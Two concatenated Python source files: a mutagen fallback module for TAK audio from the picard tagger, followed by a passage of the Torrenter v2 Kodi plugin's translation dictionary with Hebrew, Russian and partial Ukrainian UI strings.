__all__ = ["TAK", "Open", "delete"]

try:
    from mutagen.tak import (
        Open,
        TAK,
        TAKHeaderError,
        TAKInfo,
        delete,
    )
    native_tak = True
except ImportError:
    from mutagen import StreamInfo
    from mutagen.apev2 import (
        APEv2File,
        delete,
        error,
    )

    native_tak = False

    class TAKHeaderError(error):
        pass

    class TAKInfo(StreamInfo):

        """TAK stream information.

        Attributes:
          (none at the moment)
        """

        def __init__(self, fileobj):
            header = fileobj.read(4)
            if len(header) != 4 or not header.startswith(b"tBaK"):
                raise TAKHeaderError("not a TAK file")

        @staticmethod
        def pprint():
            return "Tom's lossless Audio Kompressor"

    class TAK(APEv2File):

        """TAK(filething)

        Arguments:
            filething (filething)
        Attributes:
            info (`TAKInfo`)
        """

        _Info = TAKInfo
        _mimes = ["audio/x-tak"]

        @staticmethod
        def score(filename, fileobj, header):
            return header.startswith(b"tBaK") + filename.lower().endswith(".tak")

    Open = TAK
metabrainz/picard
picard/formats/mutagenext/tak.py
Python
gpl-2.0
2,426
0.000825
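The tak.py record above falls back to a local APEv2-based TAK wrapper when mutagen has no native support; its score() hook simply sniffs the "tBaK" magic bytes and the file extension. A small usage sketch, with a placeholder path that is an assumption for illustration:

from picard.formats.mutagenext.tak import TAK

# "example.tak" is a placeholder; any readable file path will do for the sniff.
with open("example.tak", "rb") as f:
    header = f.read(4)
    print(TAK.score("example.tak", f, header))  # 2 when both magic and extension match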
# -*- coding: utf-8 -*- ''' Torrenter v2 plugin for XBMC/Kodi Copyright (C) 2012-2015 Vadim Skorba v1 - DiMartino v2 https://forums.tvaddons.ag/addon-releases/29224-torrenter-v2.html This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see <http://www.gnu.org/licenses/>. ''' try: import xbmcaddon __settings__ = xbmcaddon.Addon(id='plugin.video.torrenter') language = ('en', 'ru', 'uk','he')[int(__settings__.getSetting("language"))] except: language = 'ru' def localize(text): dictionary = { 'he': { 'Seeds searching.': 'חיפוש זורעים', 'Please Wait': 'המתן', 'Information': 'מידע', 'Torrent downloading is stopped.': 'הורדה הופסקה', 'Search': 'חפש', 'Seeds': 'זורעים', 'Peers': 'יונקים', 'Materials are loading now.': 'עולה כעת', 'Search Phrase': 'חפש', 'Magnet-link is converting': 'הקובץ נטען', 'Error': 'טעות', 'Your library out of date and can\'t save magnet-links.': 'הספריה אינה מעודכנת', 'Bookmarks': 'סימניות', 'Logout': 'התנתק', 'Login': 'התחבר', 'Recent Materials': 'חומרים אחרונים ', 'Register': 'הרשם', 'Bookmark': 'סמניות', 'Item successfully added to Bookmarks': 'הפריט הוסף לסמניות', 'Item successfully removed from Bookmarks': 'הפריט הוסר מהסימניות בהצלחה', 'Bookmark not added': 'סימניה לא הוספה', 'Bookmark not removed': 'הסימניה לא הוסרה', 'Add To Bookmarks': 'הוסף לסימניות', 'Remove From Bookmarks': 'הסר מסימניות', 'Auth': 'אישור', 'Already logged in': 'Already logged in', 'Input Email (for password recovery):': 'Input Email (for password recovery):', 'Input Email:': 'Input Email:', 'Input Password (6+ symbols):': 'Input Password (6+ symbols):', 'Input Password:': 'Input Password', 'Login successfull': 'Login successfull', 'Login failed': 'Login failed', 'User not logged in': 'Пользователь не в системе', 'User successfully logged out': 'User successfully logged out', 'Preloaded: ': 'טוען מראש', 'Do you want to STOP torrent downloading and seeding?': 'להפסיק הורדת טורנט?', 'Torrent Downloading': 'טורנט בהורדה', 'Auth expired, please relogin': 'Auth expired, please relogin', 'Storage': 'אחסון', 'Storage has been cleared': 'אחסון נוקה', 'Clear Storage': 'נקה אחסון', 'Popular': 'פופולארי', 'Views': 'צפיות', 'Uploading': 'מעלה', 'Download': 'מוריד', 'Input symbols from CAPTCHA image:': 'Input symbols from CAPTCHA image:', 'Please, rate watched video:': 'Please, rate watched video:', 'Bad': 'Bad', 'So-So': 'So-So', 'Good': 'Good', 'Ratings': 'Ratings', 'Rating': 'דירוג', 'Retry': 'נסה שנית', '%ds has left': '%ds has left', 'File failed to play! 
Do you want to RETRY and buffer more?': 'הקובץ נכשל האם לנסות שנית?', 'High Priority Files': 'קבצים בחשיבות עליונה', 'Skip All Files': 'דלג על כל הקבצים', 'Start': 'התחל', 'Stop': 'עצור', 'Play':'נגן', 'High Priority': 'חשיבות גבוהה', 'Skip File': 'דלג על הקובץ', 'Remove': 'הסר', 'Remove with files': 'הסר קבצים', 'Play File': 'נגן קובץ', 'Start All Files': 'התחל את כל הקבצים', 'Stop All Files': 'הפסק את כל הקבצים', 'Torrent-client Browser': 'דפדפן טורנט', 'Remote Torrent-client': 'טורנט מרוחק', 'You didn\'t set up replacement path in setting.': 'נא למלא נתיב לשמירה בהגדרות', 'For example /media/dl_torr/ to smb://SERVER/dl_torr/. Setup now?': 'For example /media/dl_torr/ to smb://SERVER/dl_torr/. Setup now?', 'Manual Torrent-client Path Edit': 'Manual Torrent-client Path Edit', 'Choose .torrent in video library': 'בחר בטורנט מהספריה', '.torrent Player': 'נגן טורנט', 'Choose directory:': 'בחר מיקום:', 'Starting download next episode!': 'מתחיל להורד בפרק הבא', 'Choose in torrent-client:': 'בחר לקוח טורנט', 'Search Control Window': 'הגדרת טראקרים', 'Magnet-link (magnet:...)': ' (magnet:...)קישור מגנט', 'Not a magnet-link!': 'לא קישור מגנט', 'Magnet-link Player': 'נגן קישור מגנט', 'UNKNOWN STATUS': 'סטטוס לא ידוע', 'Checking preloaded files...': 'בודק קבצים', 'Waiting for website response...': 'ממתין לתשובת האתר ', 'Search and cache information for:': 'תקצירי הסרטים יורדים', 'Open Torrent': 'פתח טורנט', 'Torrent list is empty.': 'רשימה ריקה', 'Content Lists': 'רשימות תוכן ההרחבה', 'Canceled by User': 'בוטל', 'Do you want to search and cache full metadata + arts?': 'האם תרצה להוריד מידע על הסרטים', 'This vastly decreases load speed, but you will be asked to download premade bases!': 'זה יאט את קצב ההעלאה אך יוריד מידע על הסרטים', 'Do you want to preload full metadata?': 'האם תרצה להוריד את כל המידע', 'It is highly recommended!': 'מומלץ', 'TV Shows': 'סדרות', 'Cartoons': 'אנימציה', 'Anime': 'אנימה', 'Most Recent': 'החדשים ביותר', 'Top 250 Movies': '250 הטובים ביותר', 'Top All Time': 'הטובים בכל הזמנים', 'by Genre': 'לפי קטגוריה', 'by Year': 'לפי שנה', 'Action': 'פעולה', 'Adventure': 'הרפתקאות', 'Animation': 'אנימציה', 'Biography': 'ביוגרפי', 'Comedy': 'קומדיה', 'Crime': 'פשע', 'Documentary': 'דוקומנטרי', 'Drama': 'דרמה', 'Family': 'משפחתי', 'Fantasy': 'פנטסיה', 'Film-Noir': 'פילם נואר', 'History': 'היסטורי', 'Horror': 'אימה', 'Music': 'מוזיקה', 'Musical': 'מחזמר', 'Mystery': 'מסתורי', 'Romance': 'רומנטי', 'Sci-Fi': 'מדע בדיוני', 'Short': 'קצר', 'Sport': 'ספורט', 'Thriller': 'מותחן', 'War': 'מלחמתי', 'Western': 'מערבון', '[B]by Site[/B]': '[B]על פי אתר[/B]', 'Cartoons Series': 'סדרה מצוירת', 'Cartoons Short': 'מצוירים -קצר', 'Male': 'גבר', 'Female': 'אשה', 'Russia & USSR': 'רוסיה', 'Next Page': 'הדף הבא', 'Previous Page': 'הדף הקודם', 'Russian Movies': 'סרטים רוסיים', 'israeli Movies': 'סרטים ישראלים', 'hebdub movies': 'סרטים מדובבים', 'Movies': 'סרטים', 'High Resolution Movies': 'סרטים באיכות גבוהה', '3D Movies': '3D סרטי', 'Movies [Bluray]': ' [Bluray] סרטים ', 'Anime Film': 'סרטי אנימה', 'Anime Series': 'סדרות אנימה', 'Can\'t download torrent, probably no seeds available.': 'לא ניתן להוריד את הטורנט אין מספיק זורעים', 'Personal List': 'רשימה אישית', 'Add to %s': '%s הוסף ל ', 'Delete from %s': 'מחק מ %s', 'Added!': 'נוסף!', 'Deleted!': 'נמחק', 'Search History': 'הסטורית חיפוש', ' History ':' הסטוריה ', 'Torrent History':'הסטורית טורנט', 'Watched History':'הסטורית צפיה', 'Favourites': 'מועדפים', 'Favourites SH': 'מועדפי הסטורית חיפוש', 'Clear %s': 'נקה %s', 'Clear!': 'נקה', 'kb/s': 'kb/s', 
'Queued': 'בתור', 'Checking': 'בודק', 'Downloading metadata': 'מוריד מידע', 'Downloading': 'מוריד', 'Finished': 'סיים', 'Seeding': 'זורע', 'Allocating': 'מאתר', 'Allocating file & Checking resume': 'מאתר קובץ ובודק', 'For Kids': 'לילדים', 'Adult': 'מבוגרים', 'Does not support magnet links!': 'לא תומך בקובץ מגנט!', 'Reset All Cache DBs': 'רענן מחדש', '[B]Search[/B]': '[B]חפש[/B]', 'You can always restart this by deleting DBs via Context Menu': 'You can always restart this by deleting DBs via Context Menu', 'Your preloaded databases are outdated!': 'Your preloaded databases are outdated!', 'Do you want to download new ones right now?': 'Do you want to download new ones right now?', 'Individual Tracker Options':'Individual Tracker Options', 'Downloading and copy subtitles. Please wait.':'Downloading and copy subtitles. Please wait.', 'International Check - First Run':'בדיקה אינטרנשיונאלית ', 'Delete Russian stuff?':'למחוק תוכן רוסי?', 'Save to path':'שמור בנתיב', 'Return Russian stuff':'להחזיר תוכן רוסי', '%d files have been returned':'הקובץ הוחזר', 'Download via T-client':'הורד דרך לקוח טי', 'Download via Libtorrent':'הורד דרך ליבטורנט', 'Download Status':'מצב הורדה', 'Download has not finished yet':'ההורדה לא הסתיימה', 'Stopped and Deleted!':'נעצר ונמחק', 'Unpaused!':'לא נעצר', 'Paused!':'נעצר', 'Stopped!':'הופסק', 'Started!':'התחיל', 'Delete and Stop':'מחק ועצור', 'Unpause':'אל תפסיק', 'Pause':'הפסק', 'Delete':'מחק', 'Open (no return)':'פתח', 'Torrent is seeding. To stop it use Download Status.':'Torrent is seeding. To stop it use Download Status.', 'Start All':'התחל הכל', 'Started All!':'מיין הכל', 'Stopped All!':'עצר', 'Stop All':'עצור הכל', 'Keyboard':'מקלדת', 'Copy Files in Root':'Copy Files in Root', 'Copied %d files!':'Copied %d files!', 'Add to MyShows.ru':'Add to MyShows.ru', 'Return to MyShows.ru':'Return to MyShows.ru', 'Search results:':'תוצאות חיפוש', 'by Seeders':'לפי כמות זורעים', 'by Date':'לפי זמן', 'Sort':'סדר', 'Close':'סגור', 'Views:':'צפיות:', 'Rating:':'דירוג:', 'Information not found!':'המידע לא נמצא', 'Choose searcher':'בחר טראקר', 'python-libtorrent Not Found':'לא נמצא', 'Windows has static compiled python-libtorrent included.':'לליבטורנט יש קובץ התקנה עבור ווינדוס', 'You should install "script.module.libtorrent" from "MyShows.me Kodi Repo"':'נא להתקין את הקובץ script.module.libtorrent. 
מתוך הריפו', 'Linux x64 has not static compiled python-libtorrent included.':'Linux x64 has not static compiled python-libtorrent included.', 'You should install it by "sudo apt-get install python-libtorrent"':'You should install it by "sudo apt-get install python-libtorrent"', 'Linux has static compiled python-libtorrent included but it didn\'t work.':'На Linux x86 есть статическая python-libtorrent, но она очевидно не сработала.', 'As far as I know you can compile python-libtorrent for ARMv6-7.':'As far as I know you can compile python-libtorrent for ARMv6-7.', 'You should search for "OneEvil\'s OpenELEC libtorrent" or use Ace Stream.':'Поищи "OneEvil\'s OpenELEC libtorrent" или используй Ace Stream', 'Please use install Ace Stream APK and choose it in Settings.':'Установите Ace Stream APK и выберите плеер в Найстройка плагина', 'It is possible to compile python-libtorrent for Android, but I don\'t know how.':'Вообще скомпилировать python-libtorrent на Android можно, но мы не знаем как.', 'It is possible to compile python-libtorrent for OS X.':'Вообще скомпилировать python-libtorrent на OS X можно.', 'But you would have to do it by yourself, there is some info on github.com.':'But you would have to do it by yourself, there is some info on github.com.', 'It is NOT possible to compile python-libtorrent for iOS.':'It is NOT possible to compile python-libtorrent for iOS', 'But you can use torrent-client control functions.':'But you can use torrent-client control functions.', 'I added custom searchers to Torrenter v2!':'I added custom searchers to Torrenter v2!', 'Now you can use your login on trackers or write and install your own searcher!':'Now you can use your login on trackers or write and install your own searcher!', 'Would you like to install %s from "MyShows.me Kodi Repo" in Programs section?':'Would you like to install %s from "MyShows.me Kodi Repo" in Programs section?', 'Open installation window?':'לפתוח את חלון ההתקנה?', 'Android Support':'תמיכה באנדרואיד', 'Android has no temprorary folder':'', 'Please specify storage folder in Settings!':'בחר תיקיה לשמירת הקבצים בהגדרות', 'You have no installed or active searchers! More info in Search Control Window!':'לא קיימים טראקרים פעילים נא להוסיף דרך "הגדרות טראקרים"', 'Please contact DiMartino on kodi.tv forum. We compiled python-libtorrent for Android,':'Please contact DiMartino on kodi.tv forum. We compiled python-libtorrent for Android,', 'but we need your help with some Torrent is seeding. To stop it use Download Status.s on different processors.':'but we need your help with some Torrent is seeding. To stop it use Download Status.s on different processors.', 'We added Android ARM full support to Torrenter v2!':'We added Android ARM full support to Torrenter v2!', 'I deleted pre-installed ones, install them in Search Control Window!':'I deleted pre-installed ones, install them in Search Control Window!', 'Torrenter didn\'t find %s searcher':'טראקר לא נמצא', 'Torrenter Tracker Install':'טראקר הותקן', 'Ask to save':'בקש לשמור', 'Would you like to save this file?':'האם תרצה לשמור קובץ זה?', 'Your storage path is not writable or not local! 
Please change it in settings!':'שטח אחסון הקבצים לא מקומי או שלא ניתן לכתוב בו ,שנה בהגדרות', 'Upgrade advancedsettings.xml':'Upgrade advancedsettings.xml', 'We would like to set some advanced settings for you!':'We would like to set some advanced settings for you!', 'Do it!':'עשה זאת', 'Please, restart Kodi now!':'התחל מחדש את קודי', './ (Root folder)':'./ (Root folder)', 'Opening torrent file':'פותח קבצים', 'New player to Torrenter v2 - Torrent2HTTP! It should be faster, stable and better with Android, also seeking works in it.':'נגן חדש (מומלץ)', 'Would you like to try it?':'האם תרצה לנסות', 'Torrent2HTTP enabled! Can be changed in Settings.':'Torrent2HTTP הופעל', 'Seeking':'מחפש', 'Would you like to resume from %s?':'האם תרצה לחזור מ $?', 'Seeking is working only with player Torrent2HTTP.':' לא עובד עם נגן זה ', 'Play (from %s)':'%s נגן מ', 'Play (from start)':'נגן מהתחלה', }, 'ru': { 'Seeds searching.': 'Идёт поиск сидов.', 'Please Wait': 'Подождите', 'Information': 'Информация', 'Torrent downloading is stopped.': 'Загрузка торрента прекращена.', 'Search': 'Поиск', 'Seeds': 'Сиды', 'Peers': 'Пиры', 'Materials are loading now.': 'Идёт загрузка материалов.', 'Search Phrase': 'Фраза для поиска', 'Magnet-link is converting': 'Идёт преобразование magnet-ссылки', 'Error': 'Ошибка', 'Your library out of date and can\'t save magnet-links.': 'Ваша библиотека устарела и не может сохранять магнет-ссылки.', 'Bookmarks': 'Закладки', 'Logout': 'Выход', 'Login': 'Вход', 'Recent Materials': 'Свежие Материалы ', 'Register': 'Регистрация', 'Bookmark': 'Закладка', 'Item successfully added to Bookmarks': 'Элемент удачно добавлен в закладки', 'Item successfully removed from Bookmarks': 'Элемент удачно удалён из закладок', 'Bookmark not added': 'Закладка не добавлена', 'Bookmark not removed': 'Закладка не удалена', 'Add To Bookmarks': 'Добавить в закладки', 'Remove From Bookmarks': 'Удалить из Закладок', 'Auth': 'Авторизация', 'Already logged in': 'Пользователь уже в системе', 'Input Email (for password recovery):': 'Введите E-mail (для восстановления пароля):', 'Input Email:': 'Введите E-mail:', 'Input Password (6+ symbols):': 'Введите пароль (6+ символов):', 'Input Password:': 'Введите пароль:', 'Login successfull': 'Вход выполнен успешно', 'Login failed': 'Вход не выполнен', 'User not logged in': 'Пользователь не в системе', 'User successfully logged out': 'Пользователь успешно покинул систему', 'Preloaded: ': 'Предзагружено: ', 'Do you want to STOP torrent downloading and seeding?': 'Вы хотите остановить загрузку и раздачу торрента?', 'Torrent Downloading': 'Загрузка торрента', 'Auth expired, please relogin': 'Авторизация истекла, пожалуйста войдите снова', 'Storage': 'Хранилище', 'Storage has been cleared': 'Хранилище очищено', 'Clear Storage': 'Очистить хранилище', 'Popular': 'Популярное', 'Views': 'Просмотров', 'Uploading': 'Раздача', 'Download': 'Скачать', 'Input symbols from CAPTCHA image:': 'Введите символы с картинки CAPTCHA:', 'Please, rate watched video:': 'Пожалуйста, оцените просмотренное видео:', 'Bad': 'Плохо', 'So-So': 'Такое...', 'Good': 'Отлично', 'Ratings': 'Оценки', 'Rating': 'Оценка', 'Retry': 'Повторная попытка', '%ds has left': 'Осталось %d попыток', 'File failed to play! Do you want to RETRY and buffer more?': 'Ошибка проигрывания файла! 
Хотите предзагрузить больше и повторить?', 'High Priority Files': 'Высокий Приоритет Файлам', 'Skip All Files': 'Пропустить Все Файлы', 'Start': 'Пуск', 'Stop': 'Стоп', 'Play':'Воспроизвести', 'High Priority': 'Высокий Приоритет', 'Skip File': 'Пропустить Файл', 'Remove': 'Удалить', 'Remove with files': 'Удалить с файлами', 'Play File': 'Проиграть файл', 'Start All Files': 'Пуск Всем Файлам', 'Stop All Files': 'Стоп Всем Файлам', 'Torrent-client Browser': 'Браузер Торрент-клиента', 'Remote Torrent-client': 'Удаленный торрент-клиент', 'You didn\'t set up replacement path in setting.': 'Вы не настроили замены путей.', 'For example /media/dl_torr/ to smb://SERVER/dl_torr/. Setup now?': 'Например /media/dl_torr/ на smb://SERVER/dl_torr/. Настроить?', 'Manual Torrent-client Path Edit': 'Вручную изменить папку торрент-клиента по-умолчанию', 'Choose .torrent in video library': 'Выберите .torrent в видеобиблиотеке', '.torrent Player': '.torrent Проигрыватель', 'Choose directory:': 'Выберите папку:', 'Starting download next episode!': 'Начинаю скачку следующего эпизода!', 'Choose in torrent-client:': 'Выберите раздачу:', 'Search Control Window': 'Окно Управления Поиском', 'Magnet-link (magnet:...)': 'Magnet-ссылка (magnet:...)', 'Not a magnet-link!': 'Не является magnet-ссылкой', 'Magnet-link Player': 'Проигрыватель Magnet-Ссылок', 'UNKNOWN STATUS': 'Неизвестное состояние', 'Checking preloaded files...': 'Проверка файлов...', 'Waiting for website response...': 'Ожидание ответа сайта...', 'Search and cache information for:': 'Поиск и кэширование информации для:', 'Open Torrent': 'Открыть Список файлов', 'Torrent list is empty.': 'Список раздач пуст.', 'Content Lists': 'Списки Медиа', 'Canceled by User': 'Отменено пользователем', 'Do you want to search and cache full metadata + arts?': 'Хотите автоматически получать мета-данные и арты?', 'This vastly decreases load speed, but you will be asked to download premade bases!': 'Это существенно снижает скорость загрузки, но Вам предложат скачать готовые базы!', 'Do you want to preload full metadata?': 'Хотите готовую загрузить базу данных?', 'It is highly recommended!': 'Настоятельно рекомендовано согласиться!', 'TV Shows': 'Сериалы', 'Cartoons': 'Мультфильмы', 'Anime': 'Аниме', 'Most Recent': 'Горячие Новинки', 'Top 250 Movies': 'Лучшие 250 фильмов', 'Top All Time': 'Лучшее за ВСЕ ВРЕМЯ', 'by Genre': 'по Жанру', 'by Year': 'по Году', 'Action': 'Боевики', 'Adventure': 'Приключения', 'Animation': 'Анимация', 'Biography': 'Биография', 'Comedy': 'Комедии', 'Crime': 'Детектив', 'Documentary': 'Документальное', 'Drama': 'Драмы', 'Family': 'Семейное', 'Fantasy': 'Фэнтази', 'Film-Noir': 'Нуар', 'History': 'Историчекие', 'Horror': 'Ужасы', 'Music': 'Музыкальные', 'Musical': 'Мьюзиклы', 'Mystery': 'Мистика', 'Romance': 'Мелодрамы', 'Sci-Fi': 'Фантастика', 'Short': 'Короткометражки', 'Sport': 'Спортивные', 'Thriller': 'Триллеры', 'War': 'Военные', 'Western': 'Вестерны', '[B]by Site[/B]': '[B]по Сайту[/B]', 'Cartoons Series': 'Мультсериалы', 'Cartoons Short': 'Мультфильмы (короткометражки)', 'Male': 'Мужские', 'Female': 'Женские', 'Russia & USSR': 'Россия + СССР', 'Next Page': 'Следующая Страница', 'Previous Page': 'Предыдущая Страница', '3D Movies': 'Фильмы 3D', 'Russian Movies': 'Отечественные Фильмы', 'Movies': 'Зарубежные Фильмы', 'israeli Movies': 'израильские фильмы', 'hebdub movies': 'Фильмы на иврите', 'High Resolution Movies': 'высокое разрешение фильма', 'Movies [Bluray]': 'Фильмы [Blu-ray]', 'Anime Film': 'Полнометражное Аниме', 'Anime Series': 'Аниме 
Сериалы', 'Can\'t download torrent, probably no seeds available.': 'Не могу скачать торрент, скорее всего нет доступных сидов.', 'Personal List': 'Личный Список', 'Add to %s': 'Добавить в %s', 'Delete from %s': 'Удалить из %s', 'Added!': 'Добавлено', 'Deleted!': 'Удалено!', 'Search History': 'История Поиска', ' History ':' История ', 'Torrent History':'История Торрентов', 'Watched History':'История Просмотров', 'Favourites': 'Избранное', 'Favourites SH': 'Избранное ИП', 'Clear %s': 'Очистить %s', 'Clear!': 'Очищено!', 'kb/s': 'КБ/с', 'Queued': 'В очереди', 'Checking': 'Проверка', 'Downloading metadata': 'Скачивание мета-данных', 'Downloading': 'Скачивание', 'Finished': 'Окончено', 'Seeding': 'Раздача (сидирование)', 'Allocating': 'Allocating', 'Allocating file & Checking resume': 'Allocating file & Checking resume', 'For Kids': 'Детское', 'Adult': 'Эротика', 'Does not support magnet links!': 'Не поддерживает магнит-ссылки!', 'Reset All Cache DBs': 'Сбросить Базы Данных', '[B]Search[/B]': '[B]Поиск[/B]', 'You can always restart this by deleting DBs via Context Menu': 'Вы всегда можете перезапустить этот процесс через Контекстное Меню', 'Your preloaded databases are outdated!': 'Ваши предзакаченные базы метаданных устарели!', 'Do you want to download new ones right now?': 'Хотите прямо сейчас скачать новые?', 'Individual Tracker Options':'Выбор Трекеров', 'Downloading and copy subtitles. Please wait.':'Скачиваю и копирую субтитры. Пожалуйста подождите.', 'International Check - First Run':'International Check - Первый запуск', 'Delete Russian stuff?':'Удалить русские трекеры?', 'Save to path':'Сохранить в папку', 'Return Russian stuff':'Вернуть русские трекеры', '%d files have been returned':'%d файлов возвращено', 'Download via T-client':'Скачать Торр-клиентом', 'Download via Libtorrent':'Скачать Libtorrent\'ом', 'Download Status':'Статус Загрузки', 'Download has not finished yet':'Загрука не завершена', 'Stopped and Deleted!':'Загрузка остановлена и удалена!', 'Unpaused!':'Возобновлено!', 'Paused!':'Приостановлено!', 'Stopped!':'Остановлено!', 'Started!':'Начинается загрузка!', 'Delete and Stop':'Удалить и Остановить', 'Unpause':'Возобновить', 'Pause':'Пауза', 'Delete':'Удалить', 'Open (no return)':'Открыть (без возврата)', 'Torrent is seeding. To stop it use Download Status.':'Сидирование. 
Для остановки используйте Статус Загрузки.', 'Start All':'Запустить Все', 'Started All!':'Все Запущены!', 'Stopped All!':'Все Остановлено!', 'Stop All':'Остановить Все', 'Keyboard':'Клавиатура', 'Copy Files in Root':'Скопировать файлы в Корень', 'Copied %d files!':'Скопировано %d файлов!', 'Return to %s':'Вернуться в %s', 'Search results:':'Результаты поиска:', 'by Seeders':'по Сидам', 'by Date':'по Дате', 'Sort':'Сортировка', 'Close':'Закрыть окно', 'Views:':'Просм.:', 'Rating:':'Рейтинг:', 'Information not found!':'Информация не найдена!', 'Choose searcher':'Выберите трекер', 'python-libtorrent Not Found':'python-libtorrent не найден', 'Windows has static compiled python-libtorrent included.':'На Windows при установке из репозитория к плагину идет python-libtorrent.', 'You should install "script.module.libtorrent" from "MyShows.me Kodi Repo"':'Установите "script.module.libtorrent" из "MyShows.me Kodi Repo"', 'Linux x64 has not static compiled python-libtorrent included.':'На Linux x64 не смогли собрать статическую python-libtorrent', 'You should install it by "sudo apt-get install python-libtorrent"':'Установи коммандой "sudo apt-get install python-libtorrent"', 'Linux has static compiled python-libtorrent included but it didn\'t work.':'На Linux x86 есть статическая python-libtorrent, но она очевидно не сработала.', 'As far as I know you can compile python-libtorrent for ARMv6-7.':'На ARMv6-7 можно скомпилировать python-libtorrent', 'You should search for "OneEvil\'s OpenELEC libtorrent" or use Ace Stream.':'Поищи "OneEvil\'s OpenELEC libtorrent" или используй Ace Stream', 'Please use install Ace Stream APK and choose it in Settings.':'Установите Ace Stream APK и выберите плеер в Найстройка плагина', 'It is possible to compile python-libtorrent for Android, but I don\'t know how.':'Вообще скомпилировать python-libtorrent на Android можно, но мы не знаем как.', 'It is possible to compile python-libtorrent for OS X.':'Вообще скомпилировать python-libtorrent на OS X можно.', 'But you would have to do it by yourself, there is some info on github.com.':'Но придется это тебе делать самому, на гитхабе была инфа', 'It is NOT possible to compile python-libtorrent for iOS.':'Под iOS невозможно скомпилировать python-libtorrent', 'But you can use torrent-client control functions.':'Но все остальные функции кроме прямого стриминга с торрента работают.', 'I added custom searchers to Torrenter v2!':'Я добавил внешние серчеры для трекеров в стиле Pulsar!', 'Now you can use your login on trackers or write and install your own searcher!':'Теперь можно использовать свой логин или даже написать и установить свой серчер.', 'Would you like to install %s from "MyShows.me Kodi Repo" in Programs section?':'Хотите установить %s из "MyShows.me Kodi Repo" в Программах?', 'Open installation window?':'Открыть окно установки?', 'Android Support':'Поддержка Android', 'Android has no temprorary folder':'У Android отсутствует стандартная временная папка', 'Please specify storage folder in Settings!':'Пожалуйста, укажите папку хранилища файлов!', 'You have no installed or active searchers! More info in Search Control Window!':'У вас нет установленных или активных серчеров. Подробнее в Окне Управления Поиском.', 'Please contact DiMartino on kodi.tv forum. We compiled python-libtorrent for Android,':'Свяжитесь с DiMartino на xbmc.ru. 
Мы собрали python-libtorrent на Android', 'but we need your help with some tests on different processors.':'но нам нужна помощь в тестировании на разные процессоры.', 'We added Android ARM full support to Torrenter v2!':'Мы добавили полную поддержку Android ARM в Torrenter v2!', 'I deleted pre-installed ones, install them in Search Control Window!':'Теперь серчеры нужно устанавливать отдельно в Окне Управления Поиском!', 'Torrenter didn\'t find %s searcher':'Торрентер не нашел серчер трекера %s', 'Torrenter Tracker Install':'Установка трекеров в Torrenter', 'Ask to save':'Спросить о сохранении', 'Would you like to save this file?':'Хотите сохранить данный файл?', 'Your storage path is not writable or not local! Please change it in settings!':'Ваше хранилище не доступно для записи или не локально! Измените в настройках!', 'Upgrade advancedsettings.xml':'Обновление advancedsettings.xml', 'We would like to set some advanced settings for you!':'Нам нужно обновить продвинутые настройки для работы!', 'Do it!':'Скажите "ДА"!', 'Please, restart Kodi now!':'Теперь перезагрузите Коди, пожалуйста!', './ (Root folder)':'./ (Корневой каталог)', 'Opening torrent file':'Открытие torrent-файла', 'New player to Torrenter v2 - pyrrent2http! Advantages of Torrent2HTTP but with python-libtorrent library instead of libtorrent-go!':'В Torrenter новый плеер - pyrrent2http! Преимущества Torrent2HTTP, но на библиотеке python-libtorrent вместо libtorrent-go!', 'Would you like to try it?':'Хотите его попробовать?', 'Torrent2HTTP enabled! Can be changed in Settings.':'Torrent2HTTP включен! Можно изменить в Настройках.', 'Seeking':'Перемотка', 'Would you like to resume from %s?':'Хотите начать проигрывать с %s?', 'Seeking is working only with player Torrent2HTTP.':'Перемотка работает только с плеером Torrent2HTTP.',\ 'Play (from %s)':'Играть (c %s)', 'Play (from start)':'Играть (с начала)', 'Edit':'Редактировать', 'Would you like to play next episode?':'Проиграть следующий эпизод?', }, 'uk': { 'Seeds searching.': 'Йде пошук сідів.', 'Please Wait': 'Зачекайте', 'Information': 'Інформація', 'Torrent downloading is stopped.': 'Завантаження торренту зупинено.', 'Search': 'Пошук', 'Seeds': 'Сіди', 'Peers': 'Піри', 'Materials are loading now.': 'Йде завантаження матеріалів.', 'Search Phrase': 'Фраза для пошуку', 'Magnet-link is converting.': 'Йде перетворення магнет-посилання.', 'Error': 'Помилка', 'Your library out of date and can\'t save magnet-links.': 'Ваша бібліотека застаріла і не може зберігати магнет-посилання.', 'Bookmarks': 'Закладки', 'Logout': 'Вихід', 'Login': 'Вхід', 'Recent Materials': 'Свіжі матеріали', 'Register': 'Регістрація', 'Bookmark': 'Закладка', 'Item successfully added to Bookmarks': 'Элемент успішно доданий в закладки', 'Item successfully removed from Bookmarks': 'Элемент успішно вилучений из закладок', 'Bookmark not added': 'Закладка не додана', 'Bookmark not removed': 'Закладка не вилучена', 'Add To Bookmarks': 'Додати в закладки', 'Remove From Bookmarks': 'Вилучити з закладок', 'Auth': 'Авторизація', 'Already logged in': 'Користувач вже в системі', 'Input Email (for password recovery):': 'Введіть E-mail (для відновлення паролю):', 'Input Email:': 'Введіть E-mail:', 'Input Password (6+ symbols):': 'Введіть пароль (6+ символів):', 'Input Password:': 'Введіть пароль:', 'Login successfull': 'Вхід виконаний успішно', 'Login failed': 'Вхід не виконаний', 'User not logged in': 'Користувач не в системі', 'User successfully logged out': 'Користувач успішно залишив систему', 'Preloaded: ': 'Попередньо 
завантажено: ', 'Do you want to STOP torrent downloading and seeding?': 'Ви бажаєте зупинити завантаження і раздачу торренту?', 'Torrent Downloading': 'Завантаження торренту', 'Auth expired, please relogin': 'Авторизація сплила, будь ласка, увійдіть знову', 'Storage': 'Сховище', 'Storage has been cleared': 'Сховище очищене', 'Clear Storage': 'Очистити сховище', 'Popular': 'Популярне', 'Views': 'Перегляди', 'Uploading': 'Роздача', 'Download': 'Завантажити', 'Input symbols from CAPTCHA image:': 'Введіть символи з картинки CAPTCHA:', 'Please, rate watched video:': 'Будь ласка, оцініть переглянуте відео:', 'Bad': 'Погане', 'So-So': 'Таке собі...', 'Good': 'Добре', 'Ratings': 'Оцінки', 'Rating': 'Оцінка', 'Retry': 'Повторна спроба', '%ds has left': 'Залишилось %d сброб', 'File failed to play! Do you want to RETRY and buffer more?': 'Помилка відтворення файлу! Бажаєте спробувати знову і завантажити більше?', 'High Priority Files': 'Файли високого пріоритету', 'Skip All Files': 'Пропустити всі файли', 'Start': 'Запустити', 'Stop': 'Стоп', 'Play':'Відтворити', 'High Priority': 'Високий пріоритет', 'Skip File': 'Пропустити файл', 'Remove': 